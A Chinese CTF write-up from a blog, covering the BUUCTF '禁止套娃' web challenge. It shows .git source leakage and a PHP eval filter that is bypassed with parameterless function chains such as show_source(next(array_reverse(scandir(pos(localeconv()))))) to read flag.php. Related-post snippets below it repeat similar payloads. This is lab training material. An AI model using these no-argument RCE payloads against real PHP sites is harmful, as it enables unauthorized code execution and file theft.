BUUCTF_web_禁止套娃,wp

最新推荐文章于 2023-04-08 14:06:56 发布
最新推荐文章于 2023-04-08 14:06:56 发布
阅读量160 收藏
点赞数
分类专栏: CTF 文章标签: php debian 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54227009/article/details/124686257
版权

打开靶机之后,f12并没有发现什么,

用dirsearch扫描了一波目录

 

也并没有发现什么有用的信息

然后GitHack尝试了一下,发现是源码泄露

 

获得源代码:

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

发现flag在flag.php文件中

但过滤了伪协议读取方式:data、filter、php、phpar、i(不区分大小写)

然后里面有个exp的参数,如果符合条件或绕过限制,即可执行

(?R)引用当前表达式,后面加了?递归调用。只能匹配通过无参数的函数。

过滤了et|na|info|dec|bin|hex|oct|pi|log关键字

scandir(’.’):扫描当前目录
localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是.
pos(),current():返回数组第一个值

所以构造exp=print_r(scandir(pos(localeconv())));

 发现数组第一个元素为.

第二个元素为:..

第三个元素为:.git

第四个才为flag.php

因为这里过滤了含参数的方式进行数组下标查看所以array_search()方法不可用

//数组操作函数:

  1. end():数组指针指向最后一位
  2. next(): 数组指针指向下一位
  3. array_reverse(): 将数组颠倒
  4. array_rand(): 随机返回数组的键名
  5. array_flip():交换数组的键和值
  6. 读取文件函数
  7. file_get_content() :因为et被ban,所以不能使用
  8. readfile()
  9. highlight_file()
  10. show_source()将目标文件进行高亮表示

所以:

构造payload:

exp=show_source(next(array_reverse(scandir(pos(localeconv())))));

意思为:逆向数组顺序读取第一个数组元素的下一个元素并高亮标识出来,即读取flag.php文件

同上述方法,但方法一有局限性,只能得到数组的第二位或者倒数第二位。其他情况可以使用随机返回键名的方法(刷新几次就可以得到):
exp=show_source(array_rand(array_flip(scandir(pos(localeconv()))))); 

 

鸡肋是鸡肋!
关注
专栏目录
BUUCTF-WEB-[GXYCTF2019]禁止套娃
r1727337824的博客
08-29 469
.git源码泄露+代码审计 转载大佬的WP https://blog.csdn.net/weixin_43952190/article/details/107061554 1.打开网址只显示了flag在哪,查看源代码无任何有用信息 2.用御剑也没搜索到后台目录 3.这时候考虑源码泄露 打开网址 http://33c53ef7-d371-44a3-8d84-7ab89291c754.node3.buuoj.cn/.git 出现403错误 403错误是一种在网站访问过程中,常见的错误提示,表示资源不可用。
BUUCTF web [MRCTF2020]套娃 1 wp
Whaocai的博客
08-06 484
考点: ①$SERVER数组的各个元素的含义 ②%0a绕过preg_match() ③data://text/plain;base64的利用 进去之后还是先看看有没有robots.txt文件(自己做题的习惯),发现页面并不跳转,猜测应该是index.php中有header在限制 于是查看源码,看到一段php代码 //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($qu
BUUCTF WEB 禁止套娃1
qq_41696858的博客
12-08 739
打开场景,空荡荡的,啥也没有 正常思路,扫目录,dirsearch有防扫,dirmap 扫出来.git,源码泄露没跑了 GitHacker跑出来是空文件,我也不知道为啥 GitHack看看能不能找出什么有用的东西,跑出来index.php的源码 源码如下 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|ph
BUUCTF-禁止套娃
m0_47571887的博客
11-11 476
打开题目,单纯一个flag在哪,源码啥都没有 我上一篇文章里放的链接,这一题也能用到,.git源码泄露,用GitHack.py ctf/web源码泄露及利用办法【总结中】_Sp4rkW的博客-CSDN博客_web源码泄露 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar
被监督写博客-Day6
veinard_F的博客
10-09 232
今天做的这道题也不是很难,就是在做题的时候需要联系一些函数的功能,先记录一下这些函数: scandir()可以扫描当前目录下的文件 localeconv() 返回一包含本地数字及货币格式信息的数组 array_reverse()以相反的元素顺序返回数组 array_flip()交换数组的键和值 array_rand()从数组中随机取出一个或多个单元,不断刷新访问就会不断随机返回 current()返回数组当前的值 next()将内部指针指向数组中的下一个元素,并输出 题目 [GXYCTF2019]禁止
buuctf--web--禁止套娃
m0_65766842的博客
04-08 220
1
BUUCTF__web题解合集(十一)
风过江南乱的博客
10-04 1334
1、[GKCTF2020]EZ三剑客-EzWeb 2、[BJDCTF 2nd]elementmaster 3、[MRCTF2020]套娃 4、[FBCTF2019]RCEService 5、[WUSTCTF2020]颜值成绩查询
buuctf-[GXYCTF2019]禁止套娃
qq_42728977的博客
12-24 3700
[GXYCTF2019]禁止套娃考点复现法一:单纯构造GET参数法二:构造session组合拳参考 考点 正则表达、无参数rce、git泄露 复现 法一:单纯构造GET参数 打开就一句 然后查看源码,空空如也。想到扫描后台文件,使用御剑很慢,使用dirsearch,一直429,查找资料,加了-s参数,也就是扫描不能太快。 python3 .\dirsearch.py -u http://5c0edec0-316a-4de9-999a-669f813c771b.node4.buuoj.cn:81/ -e
BUUCTF】[MRCTF2020]套娃
pofesser的博客
01-19 3044
思考 题目是套娃,感觉应该是一环一环的走下去,每个问题应该不是很难,按着他的提示做吧。 知识点 刷题 刷题的时候,习惯先查看robots.txt是否有敏感信息,然后查看源码。如果这个时候,都没有尝试爆目录了。 查看robots.txt无信息,查看源码。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/8d8ab23f032845a691d260644c24d003.png?x-oss-process=image/watermark,type_d3F5LXplbmhl
BUUCTF-WEB
ccfly1012的博客
11-02 3867
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
[GXYCTF2019] web题-禁止套娃
BROTHERYY的博客
07-28 757
复现环境:buuoj.cn 使用GitHack下载源码index.php 使用 print_r(scandir(current(localeconv())));查看目录 最终完整exp: ?exp=highlight_file(next(array_reverse(scandir(current(localeconv()))))); 用到的函数 print_r() scandir() localeconv() current() next() array_reverse() highlight_file
wp-buuctf-禁止套娃(无参绕过)【多方法】
bin789456的博客
11-08 2156
wp 一开始没看到什么东西,那就开始找吧,常用备份,robots协议,目录爆破,git泄露慢慢试。 试了下git泄露,有东西了: 打开得到的index.php,源码如下: <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
[WP-Buuoj-极客大挑战2019-信息泄露/反序列化]PHP
車鈊的博客
03-13 250
进入网页,根据提示,估计网站存在备份文件存在任意下载漏洞 尝试获取源码 常见的网站源码备份文件后缀 .rar/.zip/.7z/.tar/.tar.gz/.bak/.swp/.txt/.html/ 常见的网站源码备份文件名 web/website/backup/back/www/wwwroot/temp 经过尝试www.zip为该备份,未删除或设置权限,可进行下载操作。 tip:也可以尝试使用御剑和disearch进行扫描 打开压缩包,得到网站源码 分析源码 源码核心为2部分 index.php cl.
BUUCTF 16
qq_52431855的博客
01-29 229
知识点 WEB-INF/web.xml泄露 WEB-INF是Java的WEB应用的安全目录。如果想在页面中直接访问其中的文件,必须通过web.xml文件对要访问的文件进行相应映射才能访问。WEB-INF主要包含一下文件或目录: /WEB-INF/web.xml:Web应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。 /WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非s...
[BUUCTF刷题]禁止套娃
weixin_43952190的博客
07-01 2183
禁止套娃 exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); exp=show_source(array_rand(array_flip(scandir(pos(localeconv()))))); exp=show_source(session_id(session_start())); 进入后显示flag在哪儿,找不到线索,进行目录扫描。但也没有扫到。查看别人的wp发现是.git泄露。但是自己的网址下/.git
[GXYCTF2019]禁止套娃
satasun的博客
09-14 197
这个题目主要是无参数RCE,看到题目人都傻了,看了一下大佬的博客差不多懂了。 大佬博客 首先用御剑扫一下,得到了Git泄露的线索。git一下得到源码: <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';'
buuctf(探险2)
qq_62046696的博客
08-08 915
先上传一个一句话木马.,过滤了然后用可以通过,大概还是过滤了
BUUCTF:[GXYCTF2019]禁止套娃
末初的CSDN博客
12-08 1544
https://buuoj.cn/challenges#[GXYCTF2019]%E7%A6%81%E6%AD%A2%E5%A5%97%E5%A8%83 .git泄露,使用GitHack index.php <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i',
无参数RCE绕过之禁止套娃
qq_58970968的博客
07-10 502
知识点:无参数REC 一般有三种绕过姿势:参考文章:无参数RCE总结_L1am0ur的博客-CSDN博客_无参数rce 1.概念: 无参数RCE,其实就是通过没有参数的函数达到命令执行的目的。 没有参数的函数什么意思?一般该类题目代码如下(或类似): 有三种绕过:这里主要讲session_id(),具体其他方法参考原文章;参考文章绝优秀,思路清晰,知识全面;session_id必须要开启session才可以使用,所以我们要先使用session_start所以组合起来就是:session_id(sessi
ctfshow套娃shell
最新发布
08-24
CTFSHOW套娃shell是一种常见的利用技术,用于在Web应用程序中执行命令和控制服务器。根据提供的引用内容,以下是一种使用CTFSHOW套娃shell的方法: 1. 首先,需要获取CTFSHOW扩展。可以通过运行命令`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值